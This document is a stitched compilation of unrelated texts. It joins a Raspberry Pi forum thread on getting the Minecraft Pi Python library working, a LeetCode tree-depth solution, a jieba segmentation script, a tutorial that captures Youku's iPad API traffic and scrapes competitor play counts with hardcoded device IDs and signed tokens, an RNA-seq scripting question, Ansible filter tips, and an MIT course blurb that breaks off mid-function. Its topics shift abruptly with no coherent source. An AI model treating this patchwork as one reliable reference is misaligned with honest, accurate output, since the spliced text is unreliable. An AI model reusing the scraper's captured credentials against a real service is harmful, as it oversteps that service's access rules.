Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Hi, total Pi noob here.
Recently got a Pi B kit with an SD card already set up with Raspbian so my son can learn a little programming with Python. It's a great little bit of kit and we are really excited to set off on this path of learning. The resources available are great and so appreciated.
So far it's been good, teaching the basics of setting up and running Raspbian and some Unix command line stuff. Today though we tried to do the first Minecraft lesson and were stumped right off the bat.
We were able to run and play Minecraft, which obviously came pre-installed on the card. Great. But when we got to run the first line of Python code in the lesson we got an error. After snooping around it's obvious there is no mcpi folder in the home folder and I cannot find any instance of the Minecraft app.
So why, and how do I get it? Do I need to download a special programming version of MC? I am not set up with network access on the Pi yet. Without it I guess I'm out of luck at this point?
Thanks for any advice
AdamM
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
I think you might be following an outdated tutorial.
Try this one: https://www.raspberrypi.org/learning/ge ... ecraft-pi/
(There will not be an mcpi folder in your home directory unless you choose to create one. If you are able to run and interact with MineCraft then it is clearly installed.)
DougieLawson
Posts:40533
Joined:Sun Jun 16, 2013 11:19 pm
Location:A small cave in deepest darkest Basingstoke, UK
Contact:Website Twitter
Take a look at the Xmas edition of The MagPi Magazine: http://www.themagpi.com/issue/issue-se1/
There's six pages on getting Minecraft running on the Pi (and it was updated for the "pre-installed" version before that edition of the mag was published).
Any language using left-hand whitespace for syntax is ridiculous
Any DMs sent on Twitter will be answered next month.
Fake doctors - are all on my foes list.
Any requirement to use a crystal ball or mind reading will result in me ignoring your question.
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
B.Goode wrote: I think you might be following an outdated tutorial.
Try this one: https://www.raspberrypi.org/learning/ge ... ecraft-pi/
(There will not be an mcpi folder in your home directory unless you choose to create one. If you are able to run and interact with MineCraft then it is clearly installed.)
Thanks for the reply. That is exactly the tutorial I was following. I entered the first line of code and got an error. I'm not near the Pi now so I can't check the exact verbiage of the error. I did some reading trying to find a solution and came across the 'stuffaboutcode' website. There I read that there should be an mcpi folder and I needed to copy some files from it.
Now I'm really stumped
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Are you referring to this Python code?

Code: Select all
from mcpi import minecraft
mc = minecraft.Minecraft.create()
mc.postToChat("Hello world")

If so, 'mcpi' is a Python library, not a folder in your home directory. I just tried that first line in Python 2.7.3 interactively on my R-Pi and it worked, even though there is no folder by that name in my home directory. If that first line gives you an error, you don't have the correct Python Minecraft library, meaning you do not have a current updated version of Raspbian (mine is a fresh, current install). However for me the second line failed, because I did not have Minecraft actually running on the Pi ("connection refused"). I tried it again when I had a Minecraft game running, and all three lines worked (and "Hello world" appeared in front of the player).
Code: Select all
pi@rp22 ~ $ python
Python 2.7.3 (default, Mar 18 2014, 05:13:23)
[GCC 4.6.3] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> from mcpi import minecraft
>>> mc = minecraft.Minecraft.create()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "/usr/lib/python2.7/dist-packages/mcpi/minecraft.py", line 171, in create
return Minecraft(Connection(address, port))
File "/usr/lib/python2.7/dist-packages/mcpi/connection.py", line 17, in __init__
self.socket.connect((address, port))
File "/usr/lib/python2.7/socket.py", line 224, in meth
return getattr(self._sock,name)(*args)
socket.error: [Errno 111] Connection refused
AdamMercado wrote: Recently got a Pi B kit with an SD card already set up with Raspbian [...] I am not set up with network access on the Pi yet. Without it I guess I'm out of luck at this point?

Sorry I didn't fully read your post. Yes, you want network access in order to update your install to the current version (sudo apt-get update ; sudo apt-get upgrade).
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
DougieLawson wrote: Take a look at the Xmas edition of The MagPi Magazine: http://www.themagpi.com/issue/issue-se1/ There's six pages on getting Minecraft running on the Pi (and it was updated for the "pre-installed" version before that edition of the mag was published).

Thanks Dougie
Another fantastic learning resource for the Pi. Amazing. I will read through it and see how far I get
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
jbeale wrote: Are you referring to this Python code?

Code: Select all
from mcpi import minecraft
mc = minecraft.Minecraft.create()
mc.postToChat("Hello world")

[...] I tried it again when I had a Minecraft game running, and all three lines worked (and "Hello world" appeared in front of the player).

Great reply. Thanks for the details. Yes, that's exactly what I was entering into IDLE 3. I read somewhere else that the Minecraft API needed to be copied into mcpi, and I assumed that it was a directory. Makes sense now.
I noticed you were using a shell. I will try that.
Thx so much
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Okay, still no luck and I'm starting to get really ticked off. This is supposed to be easy for teachers and kids. I've followed numerous basic beginner lessons over the past two weeks and none of them yield anything close to the correct result.
I am not an idiot, I know it's not me. I've used computers for almost 30 years. While not a programmer, I know my way around the command line and how to self teach. I repeat, I'm not an idiot. This should be easier.
None of the advice in previous replies above works. None. I've followed it to the character. If I can't get past step one then this whole idea is a complete waste of time.
Please look at the screen images I posted to see exactly what I'm typing and the error messages I get. There is still no mcpi folder and there absolutely unequivocally should be.
Can someone please please please offer some advice that will get me on my way.
https://www.dropbox.com/s/fte94ot53c9ro ... l.jpg?dl=0
https://www.dropbox.com/s/eruhmxb1qpufv ... n.jpg?dl=0
https://www.dropbox.com/s/ax02gn4mpl8vh ... n.jpg?dl=0
Thanks
Adam
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
> There is still no mcpi folder and there absolutely unequivocally should be.
Was my earlier post useful? viewtopic.php?f=91&t=115897#p790874
There is no "mcpi" folder in the home directory /home/pi/ on my RPi 2 with current Raspbian installed, but despite that fact, this tutorial https://www.raspberrypi.org/learning/ge ... worksheet/ does work for me as expected. If it is not working for you then there must be some other cause for the problem.
Your second screenshot shows a Python error that there is "no module named mcpi" (note: "module", not "folder"). That means the Python module "mcpi" is not installed. To fix this, you can update your Raspbian install to the current version. You can do that with

Code: Select all
sudo apt-get update
sudo apt-get upgrade

assuming the Pi is connected to the internet. I don't know how to fix it without having the Pi connected to the internet, except by moving it somewhere that you can connect.
If you believe you have a fully updated version, please report the result of typing at the shell prompt:

Code: Select all
uname -a
With apologies for having referred you to the Raspberry Pi Foundation tutorial, which I assumed would be reliable, I think there might be a small - but significant - error therein.
It clearly instructs you to use the Python3 entry, which runs the IDLE3 IDE for you, which relies on the python3.2.3 interpreter.
The installed python mcpi module needs to be accessed from Python 2. You can do this by using the Python entry, which runs the IDLE IDE instead.
On the assumption that this is an error in documentation I have raised it as an Issue with the maintainers of the documentation. https://github.com/raspberrypilearning/ ... /issues/14
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
Thanks much folks for the replies. After a lot of headbanging and digging around the 'net I found out that in earlier versions of MC that did not come pre-installed there was an mcpi folder where all the API files were located. It took forever to realize that things are much different in later versions that come pre-installed.
And I found several different methods of initiating the lesson (loading the classes, connecting to the server etc), which confused the issue even more.
Also, yes, several tutorials I found stated Python 3 should be used, until I found one that mentioned using Python 2. I tried that and everything worked as expected.
There have been a few hiccups along the way. Some of the code in the Foundation lesson did not work for me (x, y, z position variables for instance) but I was able to work around that by declaring them individually. No worries.
So I was able to work through the lesson and then teach it to some 11 yr olds who loved it. Boning up on the next class. Just trying to stay a half step ahead.
So lesson learned: it's confusing when things change and you are chasing outdated info. Would be really nice if those who wrote the lessons were able to update the post to mention it is no longer valid. Especially when they have gone to the trouble to write further lessons that are more current. Unfortunately Google is not yet smart enough to discern between the two. Anyhow, that's neither here nor there and probably too much to wish for anyway.
Thanks again
Adam
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
AdamMercado, you saved us with your research and careful explanations. Thanks very much. We too wasted hours attempting to follow online tutorials and a currently in-press Raspberry Pi book.

I am concerned for the Raspberry Pi community; hopefully your post will make more people aware of the poor state of affairs for "getting started" documentation. [It seems from the lack of helpful responses to your original post that many RPi users are unaware of just how things are "disintegrating" w.r.t. clear documentation for new beginners. Seemingly there are MAJOR changes to what is installed in a kit, yet with no clear identification of this, or updating of, instructions.]

Our problems went beyond just not being able to access the Minecraft API; they began with our kit's documentation not even matching what was on the pre-installed microSD card, so that we could not even follow the first several "getting started" steps. This appears to me to portend failure for the continued spread of this wonderful project platform. It appears that getting started with a new kit is already reaching the point of being "for existing Raspberry Pi experts only" or otherwise for very patient people willing to spend hours Googling and experimenting after discovering that most of their introductory instructions are wrong.
ben_nuttall
Posts:235
Joined:Sun Aug 19, 2012 11:19 am
Location:Cambridgeshire, UK
Contact:Website Twitter
We added Python 3 support a couple of months ago. Run
```bash
sudo apt-get update
sudo apt-get upgrade
```
from the Terminal and you'll have the Python 3 version too.
Former RPF staff. Author of gpiozero and creator of piwheels.
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
mbearden wrote: AdamMercado, you saved us with your research and careful explanations. Thanks very much.

Thank you for the reply. I'm glad my rant was in some small way a little help. I wish I was able to help more; I'm such a beginner too as I stumble my way through learning this platform.
It is a shame, but somewhat understandable considering the state of flux of something as new and fast-developing as this area of computing. In which case I think it needs special attention from those reporting on it or developing resources for it, to keep the flow of information in the right direction. Outdated info helps no one in the end. Inconsistent advice will only put off new arrivals to the game.
I wish you the best of luck as you push forward with your learning. I must say, once I got over the initial set of frustrations I have been enjoying playing around with it. My students even completed their first game programmed in Minecraft last week, an exercise from the stuffaboutcode site. Very satisfying to see progress at last. I hope we can continue in this manner.
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Posts:34
Joined:Thu Jul 16, 2015 11:55 pm
Location:Fullerton, CA
Contact:Website Yahoo Messenger AOL
ben_nuttall wrote: We added Python 3 support a couple of months ago. Run

```bash
sudo apt-get update
sudo apt-get upgrade
```

from the Terminal and you'll have the Python 3 version too.

I'll stop short of saying this isn't true; you may very well have added support for Python 3. However the lessons that call for Python 3 to be used do not work for me, and I have to resort to using Python 2. This is a source of confusion that I feel needs to be straightened out.
I have already run the update/upgrade process to no avail. In fact, checking in the GUI package update manager (sorry I cannot recall its name presently, I'm still learning all the nomenclature) it shows minecraft as having an update available, but whenever I try to manually update those packages it fails.
Thanks
Raspberry Pi 2 B, Raspbian OS, No mods whatsoever
MacPro3,1, MacOSX 10.8.5, 16GB RAM 2TB
Oh Adam,
I wish I had read this before spending 3hrs going through the same woes
I have the exact same issue. I've updated my Pi with the latest updates and tried running through this: https://www.raspberrypi.org/learning/ge ... worksheet/
And it fails saying there's no module named mcpi.minecraft
I spent ages trying to sort this out, then found this thread and remembered I had followed a Minecraft whack-a-mole set of instructions that also failed. Then out of luck I tried to run the whack-a-mole using Python 2 and it was fine.
So... there's something wrong here: https://www.raspberrypi.org/learning/ge ... worksheet/ if we've both had the same issue
Can anyone provide a fix to this as it would be great to follow the Python 3 based examples on this site
TIA
Also... I'd just like to say... I think the Pi is amazing
My 7yr old Son loves Scratch and I'm wanting him to get into Python now and then go further by adding extra goodies to the Pi
So for all involved in the Pi and its support (you guys on here) you have my utmost thanks !!
So after a bit more reading it's clear that Minecraft Pi does not work with Python 3, but some (including Ben) have looked to port Minecraft Pi to Python 3 as you can see here: https://github.com/py3minepi/py3minepi
So for me one of two things should happen really to clear this up:
Either
This https://www.raspberrypi.org/learning/ge ... worksheet/ needs updating (or regressing) to show Python 2 commands not 3
Or
This https://www.raspberrypi.org/learning/ge ... worksheet/ needs updating to say you need to download this https://github.com/py3minepi/py3minepi but bear in mind its still WIP
This would save people a lot of frustration
Thanks
If you have the latest version of Raspbian, the Minecraft Pi API python library (mcpi) is Python 3 compatible.
It's important to keep software on the Pi up to date.
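A quick way to check whether the Python 3 library is present is to run this in a Python 3 shell (the second line assumes a Minecraft game is already running):

Code: Select all
from mcpi.minecraft import Minecraft
mc = Minecraft.create()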
"am I getting slower, or is stuff more complicated; either way I now have to write it down - stuffaboutcode.com"
Thanks LetHopeItsSnowing, I can confirm I did this:
https://www.raspberrypi.org/documentati ... pdating.md
yesterday and restarted the Pi before starting on using Minecraft Pi with Python 3, and had the same issues Adam had
Is there anything else I should be checking specifically?
TIA
Minecraft Pi on Raspbian Jessie no longer has the "mcpi" folder. Instead, the installation can be found in "/opt/minecraft-pi".
Python 3 works properly with the Minecraft installation. The problem is that most of the Python examples are old and based on
1. the "mcpi-folder" installation, which needs another import statement
2. the Python scripts being Python 2
And because I plan to use the recent installation for a Python course in school, I started a blog where I try to update all the information related to Python coding and Minecraft Pi.
The blog is not ready but I'm working on it continuously.
http://python-with-minecraft.goprogramming.space/
Thanks greendogs
I understand what you are saying, but the instructions here: https://www.raspberrypi.org/learning/ge ... worksheet/
and on your site state to use this command:

Code: Select all
from mcpi.minecraft import Minecraft

which is where it fails for me using Python 3.
Even if I type that directly into the shell it fails saying it cannot find the module mcpi.minecraft
So if you are saying that works fine for you, I must be different? And I'm trying to understand where I should be looking for those differences
DougieLawson
Posts:40533
Joined:Sun Jun 16, 2013 11:19 pm
Location:A small cave in deepest darkest Basingstoke, UK
Contact:Website Twitter
sudo apt-get install python{,3}-minecraftpi
Any language using left-hand whitespace for syntax is ridiculous
Any DMs sent on Twitter will be answered next month.
Fake doctors - are all on my foes list.
Any requirement to use a crystal ball or mind reading will result in me ignoring your question.
Description
Given a binary tree, find its maximum depth.
The maximum depth is the number of nodes along the longest path from the root node down to the farthest leaf node.
Note: A leaf is a node with no children.
Example:
Given binary tree [3,9,20,null,null,15,7],
    3
   / \
  9  20
    /  \
   15   7
return its depth = 3.
Explanation
List all scenarios of what a binary tree could be like:
when a binary tree is null, simply return maximum depth as 0
when a binary tree just has a root node, return maximum depth as 1
when a binary tree has a root node and child nodes, maximum depth would be the depth of the bigger side between left and right subtrees plus 1.
Java Solution
/**
 * Definition for a binary tree node.
 * public class TreeNode {
 *     int val;
 *     TreeNode left;
 *     TreeNode right;
 *     TreeNode(int x) { val = x; }
 * }
 */
class Solution {
    public int maxDepth(TreeNode root) {
        if (root == null) {
            return 0;
        }
        int leftDepth = maxDepth(root.left);
        int rightDepth = maxDepth(root.right);
        return Math.max(leftDepth, rightDepth) + 1;
    }
}
Python Solution
# Definition for a binary tree node.
# class TreeNode:
#     def __init__(self, x):
#         self.val = x
#         self.left = None
#         self.right = None
class Solution:
    def maxDepth(self, root: TreeNode) -> int:
        if root is None:
            return 0
        left = self.maxDepth(root.left)
        right = self.maxDepth(root.right)
        max_depth = max(left, right) + 1
        return max_depth
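For a quick check, here is a minimal way to run the solution on the example tree. On LeetCode the TreeNode class is provided; here we define it ourselves (define it before the Solution class if you run this as one script, because of the type annotation):

class TreeNode:
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

# Build the example tree [3,9,20,null,null,15,7].
root = TreeNode(3)
root.left = TreeNode(9)
root.right = TreeNode(20)
root.right.left = TreeNode(15)
root.right.right = TreeNode(7)

print(Solution().maxDepth(root))  # expected: 3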
The full code is as follows
# -*- encoding=utf-8 -*-
import jieba.analyse
import jieba
import pandas as pd

# Load the custom dictionary
jieba.load_userdict('dict.txt')
# Load the custom stop words
jieba.analyse.set_stop_words('stop_words.txt')

# Remove punctuation such as commas and full stops, in both Chinese and English forms
def clearSen(comment):
    comment = comment.strip()
    comment = comment.replace('、', '')
    comment = comment.replace(',', '。')
    comment = comment.replace('《', '。')
    comment = comment.replace('》', '。')
    comment = comment.replace('~', '')
    comment = comment.replace('…', '')
    comment = comment.replace('\r', '')
    comment = comment.replace('\t', ' ')
    comment = comment.replace('\f', ' ')
    comment = comment.replace('/', '')
    comment = comment.replace('、', ' ')
    comment = comment.replace('/', '')
    comment = comment.replace('。', '')
    comment = comment.replace('(', '')
    comment = comment.replace(')', '')
    comment = comment.replace('_', '')
    comment = comment.replace('?', ' ')
    comment = comment.replace('?', ' ')
    comment = comment.replace('了', '')
    comment = comment.replace('➕', '')
    comment = comment.replace(':', '')
    return comment

# Read the data
# zhengce_content = pd.read_table('0020.txt', sep=',')  # sep is explained below
zhengce_content = pd.read_table('./2016_wenben/0007.txt', sep='\t')
# Rename the column
zhengce_content.columns = ['content']
# Open the output file
outputfile = open('2016_jieba_output.txt', 'a+', encoding="utf-8")
# This is the file the segmented text is written to; put that file's path here
# (see my other article for how to write file paths)
for each in zhengce_content['content']:
    # Remove punctuation, using the function above
    kk = clearSen(each)
    # Segment with the accurate mode
    seg_list = jieba.cut(kk)
    comment = " ".join(seg_list)
    print(comment)
    # Write out the data
    outputfile.write(comment)
# Close the file
outputfile.close()
Before this, you need to understand a few things:
1. How to download and install the jieba and pandas libraries.
2. The custom dictionary, the stop words, the file to be processed, and the output file all need to be txt files in utf-8 format.
3. How to specify file paths; you can refer to my article https://blog.csdn.net/weixin_44301621/article/details/89513870
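For point 2, note that jieba's load_userdict expects one entry per line: the word, then an optional frequency and an optional part-of-speech tag, separated by spaces. A made-up dict.txt could look like this (example entries, not from the original post):

云计算 5 n
自定义词 3
新词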
Next is the explanation of sep.
When you run the following code:
print('123', 'abc', 'zhangsan')
# Output: 123 abc zhangsan
And when you run:
print('123', 'abc', 'zhangsan', sep=',')
# Output: 123,abc,zhangsan
In other words, sep specifies the separator, i.e. which character to separate items with. In the jieba segmentation code at the top, sep specifies which character a line is split on when the file is read.
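To tie this back to reading files, here is a small sketch (the file name and its contents are made up for illustration): a tab-separated file is read with sep='\t', so each line is split into columns on tabs, just as print(..., sep=',') joins its arguments with commas.

import pandas as pd

# example.txt is assumed to contain tab-separated columns
df = pd.read_table('example.txt', sep='\t')
print(df.columns)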
0. Preamble
Mining data is a rather important skill for both operations and product people, especially in the big-data era: the more valid data you have, the more accurate your decisions. Getting all kinds of data for your own website is of course no problem, but getting data about competing products usually comes at a high price. Sometimes, even for a product of a sibling department in the same company, the moment you ask for operational data you will discover that the sibling department is not very brotherly at all!!! So rather than begging others, help yourself: if you can do it, do it!
Generally, getting fairly detailed competitor data requires a third-party platform, but the data from such platforms is also very limited. For example, the recently launched Analysys Qianfan provides all kinds of statistics for a large number of mobile apps, but that data is generally only suitable for industry analysis; for product and operations people who want to base the decision for a feature or a module on it, it is far from enough. In that situation, being able to write a simple crawler yourself not only looks impressive, it is also fairly reliable: do it yourself, and scale it to your needs.
1. Preparation before getting started
What are we going to do?
Suppose I am an operations person in the video-app industry, and part of my daily work is finding out which videos competitors put in their recommendation slots each day and how many plays those videos get. This data can be used to analyze industry trends and the relationship between our own product's numbers and the competitors'. Today we take Youku as the target and grab the videos on their home page together with their play counts.
What knowledge do we need?
Crawler scripting language: Python; knowing some basic syntax is enough.
Crawler framework: Scrapy
Packet-capture tool: Charles, Fiddler, or others...
Basic command-line knowledge
Basic HTTP knowledge
2. The gateway into the world of data
What is our goal? Getting the competitor's data!
Where does the competitor's data live? On their servers?
How do we get data out of someone else's servers? Hack their servers!
you can you up...
Every company has many bridges connecting it with the internet, and the main and most accessible of these is the API. There are many ways to get hold of an API. For example, if the website or app whose data you want to grab has no public API but you happen to know their developers, then coaxing, wheedling, and outright trickery may be a simple and effective approach; the more common method, though, is to use a packet-capture tool. Below we use Charles to demonstrate how to get the API of Youku's iPad client.
There is not much to say about using Charles: set up the proxy on the device and you can capture all of the device's HTTP requests. Fortunately Youku does not use the HTTPS protocol, although that would not make a big difference. Use Filter to pick out all the youku requests.
With some simple analysis and guessing on the host and path, it is easy to figure out that the host api.mobile.youku.com is the host of the API for Youku's main content. We then select the request that looks like the Youku home page, right-click it, and click the edit option, and the structure of this API becomes very clear.
First, this is a GET request, and the API address is http://api.mobile.youku.com/layout/ipad/home/adv. The block below it holds the request parameters, whose names are quite friendly words; there are things like a user id and a device id. Exactly what these stand for does not really matter, as long as you fill the parameters in correctly when making the request. The last two parameters, s and t, are trickier: t should be a timestamp, and its value is valid for a limited period of time; I have not figured out what exactly s represents, but it is probably a field computed from the timestamp together with the other parameters. Both values are valid within a time window. Next, copy this request link, paste it into a browser, and you can see that wonderful data!
This messy-looking data does have a format: the legendary JSON format. Run it through a formatting tool and the structure becomes very clear!
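As a quick illustration of replaying the captured request outside the browser, here is a sketch using the requests library (all parameter values below are placeholders, to be taken from the captured request):

import requests

params = {"ouid": "...", "idfa": "...", "_s_": "...", "_t_": "..."}  # plus the other captured fields
resp = requests.get("http://api.mobile.youku.com/layout/ipad/home/adv", params=params)
data = resp.json()  # the JSON structure described above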
########### Import the necessary packages
# For setting the default text encoding, to make output easier
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
# Packages needed for the Scrapy crawler, the JSON format, and Request
import scrapy
import json
from scrapy.http import Request

########### Main crawler code
class DmozSpider(scrapy.Spider):
    # Declare variables for the APIs and the various parameters, for easy modification and reuse
    home_api = "http://api.mobile.youku.com/layout/ipad/home/adv"
    global detail_api, ouid, idfa, vdid, brand, os, ver, deviceid, guid, network, pid, os_ver, btype, _t_, _s_
    detail_api = "http://api.mobile.youku.com/layout/ipad4_0/play/detail"
    ouid = "8fa2748394da5b97f6636c064faaf3f61ef3442c2"
    idfa = "9C333152-19FE-4703-B026-BBBD17B4D0E7"
    vdid = "CF555DE3-3A07-429A-97FA-5D2431AD6005"
    brand = "apple"
    os = "ios"
    ver = "4%2E7%2E1"
    deviceid = "0f777264fc6318a92b9e13c65db7cd3c"
    guid = "7066707222dc38af1621eaf94a6fe779"
    network = "WIFI"
    pid = "87c959fb273378eb"
    os_ver = "10%2E0%2E2"
    btype = "iPad5,3"
    _s_ = "fec9043f65a06935a2327497d868aa67"
    _t_ = "1475939554"
    # As in the tutorial example...
    name = "dmoz"
    allowed_domains = ["youku.com"]
    start_urls = [
        # Assemble the request URL for the Youku home page
        home_api + "?" + "ouid=" + ouid + "&idfa=" + idfa + "&vdid="
        + vdid + "&brand=" + brand + "&os=" + os + "&ver=" + ver
        + "&deviceid=" + deviceid + "&guid=" + guid + "&network="
        + network + "&pid=" + pid + "&os_ver=" + os_ver + "&btype=" + btype + "&_s_=" + _s_ + "&_t_=" + _t_
    ]

    def parse(self, response):
        # Callback for a successful home-page request. The two values below are the detail page's
        # _s_ and _t_; they differ from the home page's and are also only valid for a few minutes
        d_s_ = "3f9ecdaf156976e1c43022ac115e22c7"
        d_t_ = "1475939594"
        # Parse the home-page response as JSON for the steps that follow
        js = json.loads(response.body_as_unicode())
        # Take the value for the key "results" from the returned data
        vsresult = js['results']
        # Loop over the value obtained above to get the info of every video inside
        for results in vsresult:
            try:
                vds = results["videos"]
                for vd in vds:
                    # Get the video id, then assemble the request URL of the video detail page
                    tid = vd['tid']
                    detailurl = detail_api + "?" + "id=" + tid + "&ouid=" + ouid + "&idfa=" + idfa + "&vdid=" + vdid + "&brand=" + brand + "&os=" + os + "&ver=" + ver + "&deviceid=" + deviceid + "&guid=" + guid + "&network=" + network + "&pid=" + pid + "&os_ver=" + os_ver + "&btype=" + btype + "&_s_=" + d_s_ + "&_t_=" + d_t_
                    # Request the detail page; the response is handled by parse_detail
                    yield Request(detailurl, callback=self.parse_detail)
            except Exception as e:
                continue

    # Callback invoked when the detail-page request succeeds
    def parse_detail(self, response):
        # Parse the response as JSON and take the relevant values
        js = json.loads(response.body_as_unicode())
        res = js["detail"]
        title = res["title"]
        total_vv = res["total_vv"]
        ret = title + " download: " + total_vv + "\n"
        # Write the values obtained into data.txt
        f = file("data.txt", "a+")
        f.write(ret)
        f.close()
This is the final result. Doesn't it look simple? Well, OK, it is indeed somewhat involved, yet this is only the most basic application. Once you master the method, a crawler can do a lot of very interesting things!
I am trying to use a pipeline for RNA seq which has been used by one of my colleagues. I have got a total of 8 files. These files are 8 count files of RNA seq data. I am using the less command
less wth1count.txt
less wth2count.txt
less wth3count.txt
less wth4count.txt
less 99h1count.txt
less 99h2count.txt
less 99h3count.txt
less 99h4count.txt
and to count the number of lines for each of the 8 files the command that I use is
wc -l wth1count.txt
wc -l wth2count.txt
wc -l wth3count.txt
wc -l wth4count.txt
wc -l 99h1count.txt
wc -l 99h2count.txt
wc -l 99h3count.txt
wc -l 99h4count.txt
My subsequent goal is to filter out genes with read counts lower than 5, and for that I am using this Python script
cat filtercounts.py
#!/usr/bin/python
# Load relevant modules
import sys

# Read in the HTseq gene count output files for each of the 8 samples
inputlist = [sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4], sys.argv[5], sys.argv[6], sys.argv[7], sys.argv[8]]

## Determine the genes with sufficient coverage
# Set up a variable to hold genes with sufficient coverage in any of the 8 samples
genelist = []
# For each HTseq file
for i in range(len(inputlist)):
    # Open it
    inputfile = open(inputlist[i], 'r')
    # For each line
    for line in inputfile:
        # Determine the number of reads/transcripts for this gene
        splitline = line.strip().split('\t')
        # Does it pass the threshold?
        if int(splitline[1]) >= 5:
            # If so, add it to list
            if not splitline[0] in genelist:
                genelist.append(splitline[0])
    # Close the file
    inputfile.close()

# Write out the list of sufficiently expressed genes
outputlist = open(sys.argv[9], 'w')
for gene in genelist:
    outputlist.write(gene + '\n')
outputlist.close()

## Filter each of the HTseq files for only sufficiently expressed genes across our samples
# For each HTseq file
for i in range(len(inputlist)):
    # Open it
    inputfile = open(inputlist[i], 'r')
    # Open an output 'filtered' file
    outputfile = open(sys.argv[i+10], 'w')
    # For each line
    for line in inputfile:
        # Determine the gene
        splitline = line.strip().split('\t')
        # Is it in our list?
        if splitline[0] in genelist:
            # If so, write out the original line
            outputfile.write(line)
    # Close the files
    inputfile.close()
    outputfile.close()
Problem - When I try to execute the script I get the error "list index out of range"
I am also not sure where in the script I can feed the string of files as input?
Any help will be useful.
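For what it's worth, judging from how the script indexes sys.argv it expects exactly 17 arguments on the command line: the 8 input count files (sys.argv[1] to sys.argv[8]), then the output gene list file (sys.argv[9]), then 8 filtered output files (sys.argv[10] to sys.argv[17]). A hypothetical invocation (the output file names are made up) would be:

python filtercounts.py \
    wth1count.txt wth2count.txt wth3count.txt wth4count.txt \
    99h1count.txt 99h2count.txt 99h3count.txt 99h4count.txt \
    genelist.txt \
    wth1filtered.txt wth2filtered.txt wth3filtered.txt wth4filtered.txt \
    99h1filtered.txt 99h2filtered.txt 99h3filtered.txt 99h4filtered.txt

Passing fewer arguments than this is one way to get a "list index out of range" error, right at the inputlist line.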
Method 1
Use
secure_ssl_keys_result.files|map(attribute='path')|list
It will return a list of paths:
['/etc/ssl../', '/etc/ssl/.../']
Your whole task would become:
- name: Secure ssl keys
  file: path={{ item }} user=root group=root mode=600
  with_items: secure_ssl_keys_result.files|map(attribute='path')|list
Beware that you can only select a single attribute, it is not possible to use attribute=['path', 'mode'] or similar.
Method 2
I thought of using extract to be able to fetch multiple keys (because it is sometimes necessary to have a second key for a when condition), but didn't manage to do it: I would need to map the list of dicts and then map the list of keys over each dict, which doesn't seem possible, as map only accepts a function name but not a function definition or chained functions. I would be grateful for a suggestion here!
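One possible workaround (my own suggestion, not from the original thread; it requires the jmespath Python library on the control machine) is the json_query filter, which can project several keys at once:

- debug:
    msg: "{{ secure_ssl_keys_result.files | json_query('[].{path: path, uid: uid}') }}"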
A great idea from the comments (Thanks, Uditha Desilva!):
- name: Secure ssl keys
  file: path={{ item.0 }} mode=600 owner={{ item.1 }}
  with_together:
    - secure_ssl_keys_result.files|map(attribute='path')|list
    - secure_ssl_keys_result.files|map(attribute='uid')|list
Method 3
Alternatively, a custom filter like this could be used (that's what I did before I found out about map):
from ansible import errors
import re

def cleandict(items, keepkeys):
    try:
        newitems = []
        if not isinstance(items, list):
            items = [items]
        if not isinstance(keepkeys, list):
            keepkeys = [keepkeys]
        for dictionary in items:
            newdictionary = {}
            for keepkey in keepkeys:
                newdictionary[keepkey] = dictionary.get(keepkey)
            newitems.append(newdictionary)
        return newitems
    except Exception, e:
        raise errors.AnsibleFilterError('cleandict plugin error: %s' % str(e))
        #raise errors.AnsibleFilterError('cleandict plugin error: %s, string=%s' % str(e), str(items))

class FilterModule(object):
    ''' A filter to keep only the given keys of each dict in a list. '''
    def filters(self):
        return {
            'cleandict': cleandict
        }
ansible.cfg:
filter_plugins = ~/.ansible/plugins/filter_plugins/:/usr/share/ansible_plugins/filter_plugins
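With the plugin in place, usage would look something like this (a sketch reusing the registered variable from above):

- debug:
    msg: "{{ secure_ssl_keys_result.files | cleandict(['path', 'uid']) }}"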
February 28, 2019 — Guest post by MIT 6.S191 Introduction to Deep Learning. MIT 6.S191: Introduction to Deep Learning is an introductory course offered formally at MIT and open-sourced on its course website. The class consists of a series of foundational lectures on the fundamentals of neural networks and their applications to sequence modeling, computer vision, generative models, and reinforcement learning. MIT’s offi…
MIT Introduction to Deep Learning lectures and labs are open-source and free for everyone!
MIT’s Introduction to Deep Learning consists of technical lectures on state-of-the-art algorithms as well as applied software labs in TensorFlow.
All lectures are available online for free — click here to watch!
Gain practical experience with in-depth TensorFlow software labs.
def debiasing_loss_func(x, x_pred, y_label, y_logit, z_mu, z_logsigma, kl_weight=0.005):
    # compute loss components
    reconstruction_loss = tf.reduce_mean(tf.keras.losses.MSE(x, x_pred), axis=(1,2))
    classification_loss = tf.nn.sigmoid_cross_entropy_with_logits(labels=y_label, logits=y_logit)
    kl_loss = 0.5 * tf.reduce_sum(tf.exp(z_logsigma) + tf.square(z_mu) - 1.0 - z_logsigma, axis=1)
